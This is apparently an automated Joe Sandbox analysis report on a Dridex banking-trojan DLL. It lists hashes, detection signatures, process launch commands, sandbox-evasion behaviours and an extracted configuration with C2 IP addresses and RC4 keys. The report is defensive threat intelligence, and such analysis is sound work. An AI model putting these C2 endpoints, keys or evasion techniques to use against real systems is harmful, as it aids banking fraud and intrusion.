Play interactive tour

Edit tour

Analysis Report u3A1eWFqLE.dll

Overview

General Information

Sample Name:	u3A1eWFqLE.dll
Analysis ID:	392886
MD5:	13272e189ce1c61b9a7c3660ea94ab2a
SHA1:	3593c7bb4229f1e822839c11ab3713c970b584e4
SHA256:	2e3dc149c4384b79a6f19305efa6762602100b568c4a73b88ce3b714644ed849
Tags:	40111Dridex
Infos:
Most interesting Screenshot:

Detection

Dridex Dropper

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Dridex dropper found

Found malware configuration

Yara detected Dridex unpacked file

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Tries to delay execution (extensive OutputDebugStringW loop)

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Abnormal high CPU Usage

Antivirus or Machine Learning detection for unpacked file

Contains functionality to call native functions

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to query locales information (e.g. system language)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

One or more processes crash

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 5340 cmdline: loaddll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 5328 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 3220 cmdline: rundll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5272 cmdline: rundll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll',ReadLogRecord MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 4612 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 412 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 40111, "C2 list": ["94.247.168.64:443", "159.203.93.122:8172", "50.116.27.97:2303"], "RC4 keys": ["VOw9c7u110XYjoFF2SzRWNcWNob7Sec1HxEVgBrFF", "5gZeCc8o5cQELWnF44Ik184W6MoZ25O98Rol7kPT2itFWvdxWiT70K4o4YnFUN4mL"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.617918728.0000000073321000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000005.00000002.620248864.0000000073321000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.rundll32.exe.73320000.3.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
5.2.rundll32.exe.73320000.3.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 5.2.rundll32.exe.73320000.3.unpack

Malware Configuration Extractor: Dridex {"Version": 40111, "C2 list": ["94.247.168.64:443", "159.203.93.122:8172", "50.116.27.97:2303"], "RC4 keys": ["VOw9c7u110XYjoFF2SzRWNcWNob7Sec1HxEVgBrFF", "5gZeCc8o5cQELWnF44Ik184W6MoZ25O98Rol7kPT2itFWvdxWiT70K4o4YnFUN4mL"]}

Machine Learning detection for sample

Show sources

Source: u3A1eWFqLE.dll

Joe Sandbox ML: detected

Source: 2.2.rundll32.exe.25d0000.2.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 0.2.loaddll32.exe.ec0000.1.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 5.2.rundll32.exe.23d0000.2.unpack	Avira: Label: TR/ATRAPS.Gen2

Source: u3A1eWFqLE.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: u3A1eWFqLE.dll

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: opengl32.pdb source: WerFault.exe, 00000011.00000003.547567572.0000000003387000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000011.00000003.547563461.0000000003382000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000011.00000003.542076918.0000000001051000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000011.00000003.547554748.00000000051B1000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000011.00000003.547554748.00000000051B1000.00000004.00000001.sdmp
Source:	Binary string: wgdi32full.pdbk source: WerFault.exe, 00000011.00000003.547563461.0000000003382000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000011.00000003.547567572.0000000003387000.00000004.00000040.sdmp
Source:	Binary string: opengl32.pdbY source: WerFault.exe, 00000011.00000003.547567572.0000000003387000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: rundll32.exe, 00000002.00000003.277316617.00000000045D0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.340830020.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: glu32.pdb source: WerFault.exe, 00000011.00000003.547567572.0000000003387000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000011.00000003.547554748.00000000051B1000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: rundll32.exe, 00000002.00000003.277316617.00000000045D0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.340830020.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.542068835.000000000104B000.00000004.00000001.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 00000011.00000003.547554748.00000000051B1000.00000004.00000001.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000011.00000003.547554748.00000000051B1000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000011.00000003.547567572.0000000003387000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000011.00000003.547554748.00000000051B1000.00000004.00000001.sdmp
Source:	Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000011.00000002.553395034.0000000000C92000.00000004.00000010.sdmp
Source:	Binary string: msvcrt.pdbG source: WerFault.exe, 00000011.00000003.547567572.0000000003387000.00000004.00000040.sdmp
Source:	Binary string: fffp4.pdb source: WerFault.exe, 00000011.00000003.547554748.00000000051B1000.00000004.00000001.sdmp, u3A1eWFqLE.dll
Source:	Binary string: advapi32.pdbK source: WerFault.exe, 00000011.00000003.547567572.0000000003387000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000011.00000003.547579711.0000000003380000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000011.00000003.547554748.00000000051B1000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000011.00000003.542316741.0000000001057000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000011.00000003.547567572.0000000003387000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000011.00000003.542316741.0000000001057000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000011.00000003.547554748.00000000051B1000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000011.00000003.547579711.0000000003380000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000011.00000003.547554748.00000000051B1000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000011.00000003.542076918.0000000001051000.00000004.00000001.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000011.00000003.547554748.00000000051B1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000011.00000003.547579711.0000000003380000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbk source: WerFault.exe, 00000011.00000003.547554748.00000000051B1000.00000004.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 94.247.168.64:443
Source: Malware configuration extractor	IPs: 159.203.93.122:8172
Source: Malware configuration extractor	IPs: 50.116.27.97:2303

Source: Joe Sandbox View	IP Address: 159.203.93.122 159.203.93.122
Source: Joe Sandbox View	IP Address: 50.116.27.97 50.116.27.97
Source: Joe Sandbox View	IP Address: 94.247.168.64 94.247.168.64

Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View	ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
Source: Joe Sandbox View	ASN Name: GLESYS-ASSE GLESYS-ASSE

Source: u3A1eWFqLE.dll

String found in binary or memory: http://ansicon.adoxa.vze.com/6

Source: loaddll32.exe, 00000000.00000002.558625849.0000000000B6B000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Dridex dropper found

Show sources

Source: Initial file

Signature Results: Dridex dropper behavior

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 00000002.00000002.617918728.0000000073321000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.620248864.0000000073321000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.rundll32.exe.73320000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.73320000.3.unpack, type: UNPACKEDPE

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_73332790 NtAllocateVirtualMemory,	2_2_73332790
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_7333218C NtDelayExecution,	2_2_7333218C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_7332BC00 NtClose,	2_2_7332BC00

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_733307CC	2_2_733307CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_73321494	2_2_73321494
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_733392DC	2_2_733392DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_73329144	2_2_73329144
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_7332A5A4	2_2_7332A5A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_733284E4	2_2_733284E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_733314D8	2_2_733314D8

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 412

Source: u3A1eWFqLE.dll

Binary or memory string: OriginalFilenameANSI32.dll0 vs u3A1eWFqLE.dll

Source: u3A1eWFqLE.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: u3A1eWFqLE.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal80.bank.troj.evad.winDLL@8/4@0/3

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5340

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER3493.tmp

Jump to behavior

Source: u3A1eWFqLE.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll',#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll',#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll',ReadLogRecord
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 412
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll',ReadLogRecord	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll',#1	Jump to behavior

Source: u3A1eWFqLE.dll

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: u3A1eWFqLE.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: opengl32.pdb source: WerFault.exe, 00000011.00000003.547567572.0000000003387000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000011.00000003.547563461.0000000003382000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000011.00000003.542076918.0000000001051000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000011.00000003.547554748.00000000051B1000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000011.00000003.547554748.00000000051B1000.00000004.00000001.sdmp
Source:	Binary string: wgdi32full.pdbk source: WerFault.exe, 00000011.00000003.547563461.0000000003382000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000011.00000003.547567572.0000000003387000.00000004.00000040.sdmp
Source:	Binary string: opengl32.pdbY source: WerFault.exe, 00000011.00000003.547567572.0000000003387000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: rundll32.exe, 00000002.00000003.277316617.00000000045D0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.340830020.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: glu32.pdb source: WerFault.exe, 00000011.00000003.547567572.0000000003387000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000011.00000003.547554748.00000000051B1000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: rundll32.exe, 00000002.00000003.277316617.00000000045D0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.340830020.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.542068835.000000000104B000.00000004.00000001.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 00000011.00000003.547554748.00000000051B1000.00000004.00000001.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000011.00000003.547554748.00000000051B1000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000011.00000003.547567572.0000000003387000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000011.00000003.547554748.00000000051B1000.00000004.00000001.sdmp
Source:	Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000011.00000002.553395034.0000000000C92000.00000004.00000010.sdmp
Source:	Binary string: msvcrt.pdbG source: WerFault.exe, 00000011.00000003.547567572.0000000003387000.00000004.00000040.sdmp
Source:	Binary string: fffp4.pdb source: WerFault.exe, 00000011.00000003.547554748.00000000051B1000.00000004.00000001.sdmp, u3A1eWFqLE.dll
Source:	Binary string: advapi32.pdbK source: WerFault.exe, 00000011.00000003.547567572.0000000003387000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000011.00000003.547579711.0000000003380000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000011.00000003.547554748.00000000051B1000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000011.00000003.542316741.0000000001057000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000011.00000003.547567572.0000000003387000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000011.00000003.542316741.0000000001057000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000011.00000003.547554748.00000000051B1000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000011.00000003.547579711.0000000003380000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000011.00000003.547554748.00000000051B1000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000011.00000003.542076918.0000000001051000.00000004.00000001.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000011.00000003.547554748.00000000051B1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000011.00000003.547579711.0000000003380000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbk source: WerFault.exe, 00000011.00000003.547554748.00000000051B1000.00000004.00000001.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_7332F744 push esi; mov dword ptr [esp], 00000000h

2_2_7332F745

Source: initial sample

Static PE information: section name: .text entropy: 7.55877156847

Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Section loaded: OutputDebugStringW count: 2098

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Show sources

Source: C:\Windows\System32\loaddll32.exe	Section loaded: \KnownDlls32\testapp.exe	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: \KnownDlls32\testapp.exe	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: \KnownDlls32\testapp.exe	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 1173			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 924			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_733307CC GetTokenInformation,GetSystemInfo,GetTokenInformation,

2_2_733307CC

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: WerFault.exe, 00000011.00000002.557597477.0000000004FB0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: WerFault.exe, 00000011.00000002.557597477.0000000004FB0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WerFault.exe, 00000011.00000002.557597477.0000000004FB0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: WerFault.exe, 00000011.00000002.557597477.0000000004FB0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_73326DC8 GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

2_2_73326DC8

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_73333060 RtlAddVectoredExceptionHandler,

2_2_73333060

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\u3A1eWFqLE.dll',#1

Jump to behavior

Source: rundll32.exe, 00000002.00000002.616595591.0000000002E70000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.618724186.0000000002D30000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000002.00000002.616595591.0000000002E70000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.618724186.0000000002D30000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 00000002.00000002.616595591.0000000002E70000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.618724186.0000000002D30000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: rundll32.exe, 00000002.00000002.616595591.0000000002E70000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.618724186.0000000002D30000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: rundll32.exe, 00000002.00000002.616595591.0000000002E70000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.618724186.0000000002D30000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

2_2_73326DC8

Source: C:\Windows\SysWOW64\rundll32.exe

2_2_73326DC8

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Virtualization/Sandbox Evasion21	Input Capture1	Security Software Discovery111	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information2	Security Account Manager	Virtualization/Sandbox Evasion21	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing3	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
u3A1eWFqLE.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.2.rundll32.exe.25d0000.2.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
0.2.loaddll32.exe.ec0000.1.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
5.2.rundll32.exe.23d0000.2.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ansicon.adoxa.vze.com/6	u3A1eWFqLE.dll	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
159.203.93.122	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
50.116.27.97	unknown	United States	63949	LINODE-APLinodeLLCUS	true
94.247.168.64	unknown	Sweden	43948	GLESYS-ASSE	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	392886
Start date:	19.04.2021
Start time:	23:51:34
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 3s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	u3A1eWFqLE.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
